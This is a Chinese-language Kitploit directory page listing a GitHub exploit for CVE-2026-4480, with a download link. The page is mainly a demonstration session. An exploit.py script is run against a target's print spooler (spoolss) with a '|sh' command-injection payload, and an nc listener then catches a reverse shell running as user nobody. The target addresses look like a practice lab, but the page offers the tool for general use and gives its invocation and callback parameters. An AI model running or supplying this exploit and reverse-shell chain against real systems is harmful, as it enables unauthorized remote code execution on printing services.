Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-4480 — 利用 CVE-2026-4480 | Kitploit
工具/GitHubGitHub/robinxiang/cve-2026-4480
Payload生成漏洞分析漏洞利用渗透测试命令与控制远程访问工具
GitHubrobinxiang/cve-2026-4480

CVE-2026-4480

利用 CVE-2026-4480

查看仓库
12个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

执行漏洞利用:

root@kitploit:~
python ./exploit.py -t 10.129.20.16 -l 10.10.14.172 -p 8487
[*] Target: 10.129.20.16
[*] Callback: 10.10.14.172:8487
[*] Verify mode: False

[+] Credentials initialized (anonymous)
[+] Connected to spoolss interface
[+] Opened printer: HP-Reception
[+] Created DocumentInfo with payload: |sh
[+] Generated payload (78 bytes)
[*] Starting document...
[*] Starting page...
[*] Writing payload (78 bytes)...
[*] Ending page...
[*] Ending document (TRIGGERING EXPLOIT)...
[+] Print job submitted successfully!
[+] Closed printer handle

[+] Exploit completed!
[*] Check your listener for reverse shell...

nc -lvnp 8487

root@kitploit:~
─$ nc -lvnp 8487                                                                   
listening on [any] 8487 ...
connect to [10.10.14.172] from (UNKNOWN) [10.129.20.16] 40590
bash: cannot set terminal process group (16403): Inappropriate ioctl for device
bash: no job control in this shell
nobody@abducted:/var/spool/samba$ whoami
whoami
nobody
nobody@abducted:/var/spool/samba$ id
id
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
nobody@abducted:/var/spool/samba$ 
下载工具